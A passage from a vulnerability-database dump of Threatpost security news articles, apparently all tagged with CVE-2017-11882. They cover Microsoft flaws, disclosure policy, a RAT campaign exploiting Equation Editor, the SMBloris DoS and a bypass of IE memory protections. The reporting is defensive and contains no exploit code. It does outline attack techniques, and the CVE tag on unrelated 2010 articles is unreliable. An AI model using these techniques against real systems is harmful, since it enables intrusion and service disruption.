attacker could host a Web site that \ncontains a Web page that is used to exploit this vulnerability. In \naddition, compromised Web sites and Web sites that accept or host \nuser-provided content or advertisements could contain specially crafted \ncontent that could exploit this vulnerability. In all cases, however, an \nattacker would have no way to force users to visit these Web sites. \nInstead, an attacker would have to convince users to visit the Web site, \ntypically by getting them to click a link in an e-mail message or \nInstant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060041/asp-net2.jpg)](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>)Microsoft is warning customers that it has seen ongoing attacks against the recently disclosed padding oracle [vulnerability in ASP.NET](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) and is encouraging them to [implement a workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that will help protect against the publicly disclosed exploit for the bug.\n\nThe [workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that Microsoft has developed causes ASP.NET applications to return the same error message, regardless of what the actual error it encounters is. This prevents the server from sending error messages to the attacker that might give him important information about what error was caused on the application.\n\n\u201cA workaround you can use to prevent this \nvulnerability is to enable the <customErrors> feature of ASP.NET, \nand explicitly configure your applications to always return the same error page \n\u2013 regardless of the error encountered on the server. By mapping all \nerror pages to a single error page, you prevent a hacker from \ndistinguishing between the different types of errors that occur on a \nserver**,**\u201d Microsoft\u2019s Scott Guthrie said in a blog post explaining the wrokaround. \u201c**Important**: It is not enough to \nsimply turn on CustomErrors or have it set to RemoteOnly. You also need \nto make sure that all errors are configured to return the same error \npage. This requires you to explicitly set the \u201cdefaultRedirect\u201d attribute on the <customErrors> section and ensure that no per-status codes are set.\u201d\n\nHowever, the researcher who [demonstrated the ASP.NET attack](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) at the Ekoparty conference last week, Juliano Rizzo and Thai Duong, said that the [attack will work even without error messages](<https://twitter.com/thaidn/statuses/24832350146>) from the target application. \n\nMicrosoft security officials said that they plan to release a patch for the ASP.NET flaw, although they have not specified any time frame for the release. \n", "cvss3": {}, "published": "2010-09-21T15:04:11", "type": "threatpost", "title": "Microsoft Warns of Attacks Against ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:00:14", "id": "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "href": "https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/74498/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": "https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:21", "description": "Microsoft has no plans to follow in the footsteps of Mozilla and Google and pay researchers cash rewards for the bugs that they find in Microsoft\u2019s products.\n\nIn the wake of both Mozilla and Google significantly increasing their bug bounties to the $3,000 range, there have been persistent rumors in the security community that Microsoft soon would follow suit and start paying bounties as well. However, a company official said on Thursday that Microsoft was not interested in paying bounties.\n\n\u201cWe value the researcher ecosystem, and show that in a variety of ways, but we don\u2019t think paying a per-vuln bounty is the best way. Especially when across the researcher community the motivations aren\u2019t always financial. It is well-known that we acknowledge researcher\u2019s contributions in our bulletins when a researcher has coordinated the release of vulnerability details with the release of a security update,\u201d Microsoft\u2019s Jerry Bryant said in an email. \u201cWhile we do not provide a monetary reward on a per-bug basis, like any other industry, we do recognize and honor talent. We\u2019ve had several influential folks from the researcher community join our security teams as Microsoft employees. We\u2019ve also entered into contracts directly with many vendors and sometimes individual researchers to test our products for vulnerabilities before they\u2019re released. Many of these vendors and individuals first came to our attention based on the high-quality and unique approaches demonstrated by the vulnerabilities they reported to the MSRC.\u201d\n\nSome researchers have been calling on large software vendors such as Microsoft, Adobe, Apple and others to pay for the bugs that outsiders find in their products, but so far none of these companies has shown any indication that they\u2019re willing to do so. Third-party vulnerability buyers such as TippingPoint\u2019s Zero Day Initiative and iDefense Labs pay varying amounts for vulnerabilities, depending upon the severity of the bug. And there is also an unknown number of bugs sold to government agencies, defense contractors and other buyers in private sales every year.\n\nMozilla last week said it was [raising its bug bounty to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>), and Google made a similar move four days later,[ jacking its top price up to $3,133.7](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\n[block:block=47]\n\nMicrosoft has been using outside researchers to test their software for security flaws on a contract and one-off basis for years now. But much of that work goes to boutique consultancies and not to individual researchers who find the bugs on their own time. That\u2019s one of the reasons that [some researchers have been encouraging their peers to stop reporting vulnerabilities](<https://threatpost.com/no-more-free-bugs-software-vendors-032309/>) to vendors who don\u2019t pay bug bounties. The reasoning being that the vendors have their own in-house testers and consultants, who are getting paid, so there\u2019s nothing in it for outside researchers, aside from an acknowledgement from the vendor.\n", "cvss3": {}, "published": "2010-07-22T20:54:11", "type": "threatpost", "title": "Microsoft Says No to Paying Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:29", "id": "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "href": "https://threatpost.com/microsoft-says-no-paying-bug-bounties-072210/74249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:22", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055802/micro_disclosure.jpg)](<https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/>)Microsoft is changing the way in which it handles vulnerability disclosures, now moving to a model it calls coordinated vulnerability disclosure, in which the researcher and the vendor work together to verify a vulnerability and allow ample time for a patch. However, the new philosophy also recognizes that if there are attacks already happening, it may be necessary to release details of the flaw even before a patch is ready.\n\nThe shift is a subtle one from Microsoft, which has always been at the heart of the debate over full disclosure of security vulnerabilities. The company has been very vocal in the past about its assertion that all vulnerabilities in its products should be reported privately to the company and the researcher should then give Microsoft some undisclosed amount of time to come up with a fix. The new CVD strategy still doesn\u2019t lay out a timeline for patch releases, but it represents a public change in the way the company is thinking.\n\nThe new CVD strategy relies on researchers to report vulnerabilities either directly to a vendor or to a trusted third party, such as a CERT-CC, who will then report it to the vendor. The finder and the vendor would then try to agree on a disclosure timeline and work from there. \n\n\u201d Newly discovered vulnerabilities in hardware, software, and services \nare disclosed directly to the vendors of the affected product, to a \nCERT-CC or other coordinator who will report to the vendor privately, or \nto a private service that will likewise report to the vendor privately. \nThe finder allows the vendor an opportunity to diagnose and offer fully \ntested updates, workarounds, or other corrective measures before \ndetailed vulnerability or exploit information is shared publicly. If \nattacks are underway in the wild, earlier public vulnerability details \ndisclosure can occur with both the finder and vendor working together as \nclosely as possible to provide consistent messaging and guidance to \ncustomers to protect themselves,\u201d said Matt Thomlinson, general manager of Microsoft\u2019s Trustworthy Computing group. \n\n\u201cCVD does not represent a huge departure from the current definition \nof \u201cresponsible disclosure,\u201d and we would still view vulnerability \ndetails being released broadly outside these guidelines as putting \ncustomers at unnecessary levels of risk. However, CVD does allow for \nmore focused coordination on how issues are addressed publicly. CVD\u2019s \ncore principles are simple: vendors and finders need to work closely \ntoward a resolution; extensive efforts should be made to make a timely \nresponse; and only in the event of active attacks is public disclosure, \nfocused on mitigations and workarounds, likely the best course of action \n\u2014 and even then it should be coordinated as closely as possible.\u201d\n\nThe change from Microsoft comes close on the heels of several other major shifts in the landscape recently, including the decisions by both Google and Mozilla to raise their bounties for security bugs to $3,133.7 and $3,000, respectively. Microsoft has steadfastly refused to pay bug bounties in the past, though there are persistent rumors that the company may do so at some point in the near future. \n\nThe CVD plan closely resembles other disclosure strategies that have been released over the years, and incorporates some elements of plans that researchers have suggested. The use of trusted third parties, such as the CERT-CC, is something that has been suggested by a number of people in the past, and has the advantage of including a dispassionate organization that can work with both the researcher and the vendor when conflicts arise or if the vendor is unresponsive. \n\nThe new CVD policy, in fact, incorporates some of the elements that were laid out in a [plan written by the defunct Organization for Internet Safey in 2004](<http://www.symantec.com/security/OIS_Guidelines%20for%20responsible%20disclosure.pdf>), particularly the usage of third parties to help moderate the process.\n\nThe key concession in the new CVD strategy is the acknowledgement that there are times when it may be necessary for the researcher to disclose details of a given vulnerability before a patch is ready. This often is done if a vendor is not responsive to the researcher or if the researcher doesn\u2019t think the vendor is making a good faith effort to fix a flaw quickly enough. However, as Microsoft says in its policy, disclosure of flaw details may be necessary in cases where attacks against the vulnerability are already underway in the wild and security staffs need information on the problem to help protect their networks. \n\nKatie Moussouris, a senior security strategist at Microsoft, said in a [related blog post](<http://blogs.technet.com/b/ecostrat/archive/2010/07/22/coordinated-vulnerability-disclosure-bringing-balance-to-the-force.aspx>) that the company needs help from the research community to make this CVD philosophy work.\n\n[block:block=47]\n\n\u201cResponsible Disclosure should be deprecated in favor of something \nfocused on getting the job done, which is to improve security and to \nprotect users and systems. As such, Microsoft is asking researchers to \nwork with us under Coordinated Vulnerability Disclosure, and added some \ncoordinated public disclosure possibilities before a vendor-supplied \npatch is available when active attacks are underway. It uses the trigger \nof attacks in the wild to switch modes, which is an event that is \nobjectively observable by many independent sources,\u201d she wrote. \u201cMake no mistake about it, CVD is basically founded on the initial \npremise of Responsible Disclosure, but with a coordinated public \ndisclosure strategy if attacks begin in the wild. That said, what\u2019s \ncritical in the reframing is the heightened role coordination and shared \nresponsibility play in the nature and accepted practice of \nvulnerability disclosure. This is imperative to understand amidst a \nchanging threat landscape, where we all accept that no longer can one \nindividual, company or technology solve the online crime challenge.\u201d \n", "cvss3": {}, "published": "2010-07-22T16:50:37", "type": "threatpost", "title": "Microsoft Shifts to 'Coordinated Vulnerability Disclosure' Policy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:21:38", "id": "THREATPOST:E539817E8025A93279C63158F37F2DFB", "href": "https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/74247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:39", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055611/windows_patch_61.jpg)](<https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/>)The Microsoft Patch Tuesday train rolled into town today, dropping off a massive 10 security bulletins with fixes for at least 34 documented vulnerabilities. \n\nThree of the bulletins are rated \u201ccritical\u201d because of the risk of remote code execution attacks. Affected products include the Windows operating system, Microsoft Office, the Internet Explorer browser and Internet Information Services (IIS).\n\nThis month\u2019s patch batch also provides cover for a known cross-site scripting flaw in the Microsoft SharePoint Server and a publicly discussed data leakage hole in Internet Explorer.\n\nMicrosoft is urging its users to pay special attention to [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) (Windows), [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) (ActiveX killbits) and [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) (Internet Explorer) because these contain fixes for issues that may be exploited by malicious hackers very soon.\n\nHere\u2019s the skinny on these three bulletins:\n\n * [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) \u2014 This security update resolves two privately reported vulnerabilities \nin Microsoft Windows. These vulnerabilities could allow remote code \nexecution if a user opens a specially crafted media file or receives \nspecially crafted streaming content from a Web site or any application \nthat delivers Web content. This is rated Critical for Quartz.dll \n(DirectShow) on Microsoft Windows 2000, Windows XP, Windows Server 2003, \nWindows Vista, and Windows Server 2008; Critical for Windows Media \nFormat Runtime on Microsoft Windows 2000, Windows XP, and Windows Server \n2003; Critical for Asycfilt.dll (COM component) on Microsoft Windows \n2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server \n2008, Windows 7, and Windows Server 2008 R2; and Important for Windows \nMedia Encoder 9 x86 and x64 on Microsoft Windows 2000, Windows XP, \nWindows Server 2003, Windows Vista, and Windows Server 2008.\n * [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) \u2014 This security update addresses two privately reported vulnerabilities \nfor Microsoft software. This security update is rated Critical for all \nsupported editions of Microsoft Windows 2000, Windows XP, Windows Vista, \nand Windows 7, and Moderate for all supported editions of Windows \nServer 2003, Windows Server2008, and Windows Server 2008 R2. The vulnerabilities could allow remote code \nexecution if a user views a specially crafted Web page that instantiates \na specific ActiveX control with Internet Explorer. It also includes kill bits for four third-party ActiveX controls.\n * [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) \u2014 Fixes five privately reported vulnerabilities and one publicly \ndisclosed vulnerability in Internet Explorer. The most severe \nvulnerabilities could allow remote code execution if a user views a \nspecially crafted Web page using Internet Explorer. Users whose accounts \nare configured to have fewer user rights on the system could be less \nimpacted than users who operate with administrative user rights.This \nsecurity update is rated Critical for Internet Explorer 6 Service Pack 1 \non Microsoft Windows 2000 Service Pack 4; Critical for Internet \nExplorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows \nclients; and Moderate for Internet Explorer 6, Internet Explorer 7, and \nInternet Explorer 8 on Windows servers.\n\nQualys CTO Wolfgang Kandek noticed that four of the 10 bulletins address zero-day issues, the most significant being MS10-035, which fixes the zero-day published by Core Security for an information disclosure vulnerability originally published in February 2010. It also fixes the PWN2OWN vulnerability that security researcher Peter Vreugdenhil used to win ZDI\u2019S competition at CANSECWEST. During that contest, Vreugdenhil bypassed all built-in protections such as DEP and ASLR by combining multiple attack methods. \n \nThe MS10-040 bulletin is also interesting. It covers a a remotely exploitable vulnerability in all versions of IIS, but it is present only if the administrator has downloaded and installed the Channel Binding Update and enabled Windows Authentication. It further requires an account on the system, reducing the number of vulnerable hosts to a small subset. Microsoft rates this an \u201cimportant\u201d update.\n", "cvss3": {}, "published": "2010-06-08T19:07:32", "type": "threatpost", "title": "Patch Tuesday: Microsoft Kills Pwn2Own Browser Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:36:58", "id": "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "href": "https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/74077/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055513/microsoft_govt.jpg)](<https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/>)Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) will offer governments entities at the national level with technical information on vulnerabilities that are being updated in our products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-12T05:58:56", "description": "A series of espionage attacks have been uncovered, targeted at service centers in Russia that provide maintenance and support for a variety of electronic goods.\n\nThe payload is a commercial version of the [Imminent Monitor](<https://imminentmethods.net/features/>) tool, which is freely available for purchase as legitimate software. Its developers explicitly prohibit any usage of the tool in a malicious way \u2013 which bad actors are clearly ignoring.\n\nImminent Monitor includes two modules for recording video from a victim\u2019s webcam, along with three others that contain different spy and control functionalities, such as looking at file contents on the victim\u2019s machine.\n\n**A Long and Winding Kill Chain**\n\nFortiGuard Labs said that the multi-stage attacks use a whole bag of tricks to carry out their dirty work, including spoofed emails, malicious Office documents and a variety of unpacking techniques for Imminent Monitor, which functions as a remote access trojan (RAT).\n\nThe kill chain starts, as many attacks do, with fraudulent emails. In this case, they purport to be from Korean consumer electronics giant Samsung. FortiGuard researchers said that the nature of the mails suggests a targeted attack, not just a \u201cspray-and-pray\u201d random spam campaign.\n\n\u201cThe email was specifically sent to the service company that repairs Samsung\u2019s electronic devices,\u201d the firm said in [an analysis](<https://www.fortinet.com/blog/threat-research/non-russion-matryoshka-russian-service-centers-under-attack.html>) on Thursday, adding that the emails contain Excel files with the same naming convention that the targeted company uses in legitimate transactions.\n\nFurther, the spreadsheet files, which may have been lifted from a legitimate source, have been weaponized with an exploit for a vulnerability, CVE-2017-11882, in a 17-year-old piece of software.\n\n\u201cThe use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years,\u201d the team said. \u201cIt is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case.\u201d\n\nInterestingly, the vulnerability exists in an Office component called the Equation Editor (eqnedt32.exe), which allows users to insert mathematical and scientific equations into documents. It was kept around for compatibility reasons despite being flawed. Last year, Microsoft [manually patched](<https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html>) a buffer overflow bug in it \u2014 the flaw used in these campaigns.\n\nRumors have gone around that choosing to patch the binary file rather than fixing the code itself suggests Microsoft lost the source code of the flawed feature, FortiGuard pointed out.\n\n\u201cThe malware authors clearly love this vulnerability because it allows them to achieve a stable exploitation across all current Windows platforms,\u201d the researchers said.\n\nFrom there, the exploit\u2019s shellcode takes a look at the export directory of the kernel32.dll on the targeted machine and locates the addresses of two key functions: LoadLibraryA and GetProcAddress. These are then used to obtain the addresses of the other necessary functions for the attack, including an important capability to determine the exact landing location for the payload, since this will vary, according to platform.\n\nFinally, the shellcode downloads the Imminent Monitor payload and then tries to execute it: The RAT is tucked into five different protective layers, including the ConfuserEx packer, which obfuscates objects names, as well as names of methods and resources, to make it hard to read and be understood by humans. ConfuserEx actually shows up twice; the second time, it includes a Rick-Rolling attempt.\n\nAnother packer used is the BootstrapCS executable, which performs anti-analysis checks; and eventually, for the final unpacking procedure of the RAT itself, the file uses the legit \u201clzma.dll\u201d library from 7Zip.\n\n**Not Their First Rodeo**\n\nEven though the emails are written in Russian, the attacks are coming from outside the country, carried out by a group known for other campaigns.\n\nThe analysts said that it\u2019s \u201chighly unlikely\u201d that a native Russian speaker wrote the email text, but rather, it seems to be run through a translator. Also, even though the \u201cfrom\u201d address appears to be Russian in origin, an examination of the headers revealed that IP address of the sender isn\u2019t related to the email address\u2019 domain.\n\nAlso, in analyzing the C2 servers used in the attacks, FortiGuard found, based on the registrant data, that 50 domains were all registered on the same day.\n\n\u201cSome of these domains have already been used for malware spreading,\u201d the firm said. \u201cAnother group was linked to the phishing campaigns.\u201d\n\nFortiGuard also searched its collection of samples and found several spreadsheet samples that use the same C2 servers as the samples from these attacks.\n\n\u201cThe samples are older and use different vulnerabilities,\u201d the researchers said. \u201cWe believe that this same group of attackers are behind both groups of samples.\u201d\n\nWhile it\u2019s unclear who exactly is behind the attacks, it\u2019s clear that this campaign is not the first \u2013 and will probably not be the last \u2013 for the bad actors.\n", "cvss3": {}, "published": "2018-06-07T19:43:35", "type": "threatpost", "title": "Targeted Spy Campaign Hits Russian Service Centers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-07T19:43:35", "id": "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "href": "https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:21", "description": "LAS VEGAS\u2014A 20-year-old Windows SMB vulnerability is expected to be disclosed Saturday during a talk at DEF CON.\n\nMicrosoft has said it will not patch the vulnerability, which allows an attacker to remotely crash a Windows server with relative ease using only 20 lines of Python code and a Raspberry Pi.\n\nThe vulnerability affects every version of the SMB protocol and every Windows version dating back to Windows 2000. It was likely introduced into the operating system much earlier, said Sean Dillon, senior security researcher at RiskSense. Dillon, who conducted his research with colleague Zach Harding, called the attack SMBloris because it is comparable to [Slowloris](<https://threatpost.com/mitigating-slowloris-http-dos-attack-062209/72845/>), a 2009 attack developed by [Robert Hansen](<http://ha.ckers.org/blog/20090617/slowloris-http-dos/>). Both attacks can use a single machine to crash or freeze a much more powerful server, but Slowloris, unlike SMBloris, targets webservers.\n\n\u201cSimilar to Slowloris, it requires opening many connections to the server, but these are low-cost connections for the attacker, so a single machine is able to perform the attack,\u201d Dillon said.\n\nDillon was among the first researchers to analyze EternalBlue, the leaked NSA SMB exploit that was used to spread the WannaCry ransomware attack and ExPetr wiper malware. It was during that analysis that Dillon uncovered this issue.\n\n\u201cWhile working on EternalBlue, we observed a pattern in the way memory allocations were done on the non-paged pool of the Windows kernel. The non-paged pool is memory that has to be reserved in physical RAM; it can\u2019t be swapped out,\u201d Dillon explained. \u201cThat\u2019s the most precious pool of memory on the system. We figured out how to exhaust that pool, even on servers that are very beefy, even 128 GB of memory. We can take that down with a Raspberry Pi.\u201d\n\nThe issue was privately reported to Microsoft in early June as the EternalBlue analysis was completed, Dillon said. Microsoft told the researchers that two internal security teams concluded the vulnerability was a moderate issue and would not be moved into the security branch, and likely never fixed. Saturday\u2019s DEF CON talk will be 60 days after the initial report was sent to Microsoft and 45 days after Microsoft\u2019s response was relayed.\n\n\u201cThe case offers no serious security implications and we do not plan to address it with a security update,\u201d a Microsoft spokesperson told Threatpost. \u201cFor enterprise customers who may be concerned, we recommend they consider blocking access from the internet to SMBv1.\u201d\n\n\u201cThe reason they say it\u2019s a moderate issue is because it does require opening many connections to the server, but you could do it all from a single machine, and a Raspberry Pi could take down the beefiest server,\u201d Dillon said.\n\nThe vulnerability lies in the way SMB packets are processed and memory is allocated. Dillon and Harding said they found a way to take advantage of that allocation system to crash a server.\n\n\u201cIt will amplify already existing attacks like DDoS attacks,\u201d Dillon said. \u201cWhy DDoS when you can DoS from a single machine. You don\u2019t need a botnet to take down a Windows server.\u201d\n\nThe attack is able to allocate all memory a server has available, to the point where it won\u2019t even blue screen, Dillon said. The operating system crashes as it looks through long memory lists looking for unallocated memory, causing the CPU to spike.\n\n\u201cYou get critical services to crash and you can completely freeze the system,\u201d Dillon said. \u201cThere are also lots of integrity issues because when you have all the non-paged pool memory allocated already, certain disk rights, even logging can\u2019t take place because there\u2019s no memory. One of the problems we\u2019ve run into is that we\u2019ve completely exhausted the system and cause it to freeze; one of the reasons it doesn\u2019t blue-screen is because it doesn\u2019t have enough resources needed to blue-screen. It will freeze and never come back.\u201d\n\nDillon said he and Harding will share some additional technical details during their talk and will demo the attack.\n\n\u201cIt\u2019s such a simple attack really; I think a lot of the people there will be able to catch on to what\u2019s happening,\u201d Dillon said.\n\nAs for a fix, Dillon believes it wouldn\u2019t be a simple task for Microsoft.\n\n\u201cI think that\u2019s the problem is that it\u2019s not the easiest fix; it\u2019s the way they\u2019ve done SMB memory allocation for over 20 years. So everything relies on the fact the client says \u2018I have a buffer that I\u2019m sending that\u2019s this big.\u2019 The server reserves that much memory so it can handle it,\u201d Dillon said. \u201cWhat we did we say I have a huge buffer and never send the buffer. There\u2019s still a lot of components that rely on the fact that buffer is already allocated and the size is already known.\u201d\n\nDillon said a mitigation can be applied through inline devices including firewalls by limiting the number of active connections from a single IP address to SMB ports.\n\nIronically, the only reason Dillon and Harding found the bug was because this critical information used in the pool grooming for EternalBlue.\n\n\u201cYou have to have those allocations happen,\u201d Dillon said. \u201cSo actually, if this behavior was not the way it was, the pool grooming in EternalBlue would not be the same and the exploit might not work at all.\u201d\n", "cvss3": {}, "published": "2017-07-26T09:00:26", "type": "threatpost", "title": "Windows SMB Zero Day to Be Disclosed During DEF CON", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-07-31T22:05:32", "id": "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "href": "https://threatpost.com/windows-smb-zero-day-to-be-disclosed-during-def-con/126927/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.\n\nMicrosoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delay Free were bound to attract some attention and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said.\n\n> DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fbypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie%2F110570%2F&text=DeMott%26%238217%3Bs+bypass+works+through+the+use+of+what+he+calls+a+%26%238220%3Blong-lived+dangling+pointer.%26%238221%3B>)\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. \u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult 